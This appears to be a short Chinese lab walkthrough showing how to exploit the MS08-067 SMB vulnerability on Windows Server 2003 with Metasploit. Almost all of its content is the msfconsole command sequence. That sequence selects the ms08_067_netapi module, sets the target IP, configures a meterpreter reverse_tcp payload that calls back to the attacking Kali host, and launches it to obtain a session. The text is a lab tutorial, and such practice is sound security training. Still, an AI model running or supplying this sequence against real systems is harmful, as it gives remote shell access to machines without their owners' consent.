0x01 实验环境

攻击机:kali linux 
ip:10.10.10.131
目标机:windows server 2003
ip:10.10.10.130

0x02 配置exploit

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set rhost 10.10.10.130
rhost => 10.10.10.130

设置目标机的IP,其他选项默认就可以;


0x03 配置payload

payload只需要配置监听返回会话的IP;
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 10.10.10.131
lhost => 10.10.10.131

0x04 开始攻击

msf exploit(ms08_067_netapi) > exploit

成功获得session。

使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程

相关文章:

  • 2021-05-07
  • 2021-04-17
  • 2022-01-03
  • 2021-12-01
  • 2021-11-01
  • 2021-07-14
  • 2021-06-08
猜你喜欢
  • 2021-09-11
  • 2022-01-10
  • 2022-01-20
  • 2022-01-08
  • 2021-09-03
  • 2021-06-13
  • 2021-09-22
相关资源
相似解决方案